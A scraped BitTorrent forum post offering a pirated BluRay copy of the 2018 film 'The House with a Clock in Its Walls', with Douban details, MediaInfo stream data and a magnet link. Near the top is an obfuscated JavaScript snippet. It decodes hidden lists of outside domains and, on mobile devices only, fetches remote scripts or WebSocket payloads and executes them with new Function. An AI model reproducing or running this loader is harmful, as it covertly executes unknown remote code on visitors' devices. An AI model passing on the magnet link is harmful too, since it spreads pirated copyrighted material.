滴答屋[双语字幕].The.House.with.a.Clock.in.Its.Walls.2018.1080p.BluRay.x264.DTS-迅雷下载 11.79GB

版主小s 28天前 133

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 滴答屋/墙上有一个钟的房子/墙里有钟的房子/魔钟奇幻屋(港)

◎片 名 The House with a Clock in its Walls

◎年 代 2018

◎产 地 美国,印度,加拿大

◎类 别 喜剧 / 惊悚 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 2018-09-21(美国) / 2018-11-01(中国大陆)

◎豆瓣评分 5.4/10 from 17553 users

◎豆瓣链接 https://movie.douban.com/subject/10759740/

◎片 长 104分钟

◎导 演 伊莱·罗斯 Eli Roth

◎编 剧 艾力克·克莱普科 Eric Kripke / 约翰·贝莱尔 John Bellairs

◎主 演 杰克·布莱克 Jack Black

凯特·布兰切特 Cate Blanchett

欧文·瓦卡罗 Owen Vaccaro

凯尔·麦克拉克伦 Kyle MacLachlan

芮妮·戈兹贝里 Renee Goldsberry

考林·加普 Colleen Camp

桑尼·苏尔季克 Sunny Suljic

洛伦扎·伊佐 Lorenza Izzo

布拉克斯顿·比肯 Braxton Bjerken

Vanessa Anne Williams Vanessa Anne Williams

查尔斯·格林 Charles Green

德琼·瓦茨 De'Jon Watts

艾伦·比尔纳 Aaron Beelner

Christian Calloway Christian Calloway

伊莱·罗斯 Eli Roth

Anna Chuancheun Anna Chuancheun

德梅特里·兰德尔 Demetri Landell

佩拉·米德尔顿 Perla Middleton

◎标 签 魔幻 | 美国 | 儿童 | 魔法 | 2018 | 喜剧 | 冒险 | 惊悚

◎简 介

路易斯(欧文·瓦卡罗 Owen Vaccaro 饰)的父母在一场可怕的事故中双双离他而去,无依无靠的路易斯只得收拾行囊投奔他多年未见的舅舅乔纳森(杰克·布莱克 Jack Black 饰)。让路易斯没有想到的是,看上去平平无奇的乔纳森,他的真实身份竟然是一位拥有强大法力的魔法师。

就这样,路易斯在舅舅那栋到处都发生着超自然现象的屋子里安了家,并且结识了舅舅的好友齐默尔曼夫人(凯特·布兰切特 Cate Blanchett 饰)。屋子里总有一种奇怪的嘀嗒声,乔纳森和齐默尔曼夫人企图找到这种声音的源头却无果,而这一切的始作俑者,是邪恶的黑魔法夫妻艾萨克(凯尔·麦克拉克伦 Kyle MacLachlan 饰)和赛琳娜(芮妮·戈兹贝里 Renee Goldsberry 饰)。

◎获奖情况

第23届美国艺术指导工会奖 ?(2019)

电影奖最佳幻想电影艺术指导(提名) 乔恩·赫特曼

  1. General

  2. Unique ID : 143249749855142062438722390748032995041 (0x6BC4E5F57E9C660D7CD4941C8B610EE1)

  3. Complete name : The.House.with.a.Clock.in.Its.Walls.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.8 GiB

  7. Duration : 1 h 45 min

  8. Overall bit rate : 16.1 Mb/s

  9. Movie name : The House with a Clock in Its Walls 2018

  10. Encoded date : UTC 2021-07-02 07:45:35

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 45 min

  25. Bit rate : 14.5 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.391

  36. Stream size : 10.6 GiB (90%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.75 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 45 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 510 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.11 GiB (9%)

  57. Language : English

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. ID in the original source medium : 4614 (0x1206)

  63. Format : PGS

  64. Muxing mode : zlib

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 38 min

  68. Bit rate : 46.5 kb/s

  69. Count of elements : 2127

  70. Stream size : 32.8 MiB (0%)

  71. Title : chs&eng

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No

  75. Original source medium : Blu-ray


  76. Text #2

  77. ID : 4

  78. ID in the original source medium : 4615 (0x1207)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 38 min

  84. Bit rate : 46.8 kb/s

  85. Count of elements : 2127

  86. Stream size : 33.0 MiB (0%)

  87. Title : cht&eng

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #3

  93. ID : 5

  94. ID in the original source medium : 4616 (0x1208)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 38 min

  100. Bit rate : 26.3 kb/s

  101. Count of elements : 2127

  102. Stream size : 18.6 MiB (0%)

  103. Title : chs

  104. Language : Chinese

  105. Default : Yes

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #4

  109. ID : 6

  110. ID in the original source medium : 4617 (0x1209)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 1 h 38 min

  116. Bit rate : 26.6 kb/s

  117. Count of elements : 2127

  118. Stream size : 18.8 MiB (0%)

  119. Title : cht

  120. Language : Chinese

  121. Default : Yes

  122. Forced : No

  123. Original source medium : Blu-ray


  124. Text #5

  125. ID : 7

  126. ID in the original source medium : 4608 (0x1200)

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 39 min

  132. Bit rate : 46.2 kb/s

  133. Count of elements : 3259

  134. Stream size : 32.8 MiB (0%)

  135. Language : English

  136. Default : Yes

  137. Forced : No

  138. Original source medium : Blu-ray


  139. Menu

  140. 00:00:00.000 : Chapter 01

  141. 00:05:32.707 : Chapter 02

  142. 00:11:59.635 : Chapter 03

  143. 00:16:41.792 : Chapter 04

  144. 00:22:41.985 : Chapter 05

  145. 00:27:43.536 : Chapter 06

  146. 00:31:11.494 : Chapter 07

  147. 00:34:58.346 : Chapter 08

  148. 00:39:05.843 : Chapter 09

  149. 00:44:35.422 : Chapter 10

  150. 00:49:56.034 : Chapter 11

  151. 00:53:44.221 : Chapter 12

  152. 00:58:07.734 : Chapter 13

  153. 01:05:02.064 : Chapter 14

  154. 01:11:44.842 : Chapter 15

  155. 01:15:59.638 : Chapter 16

  156. 01:21:33.805 : Chapter 17

  157. 01:26:39.986 : Chapter 18

  158. 01:33:34.650 : Chapter 19

  159. 01:39:03.938 : Chapter 20


TAGS 奇幻 冒险 惊悚 喜剧

磁力链:
  • magnet:?xt=urn:btih:DFD96D364CD9A66B87998FD7E2225F228F231961
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回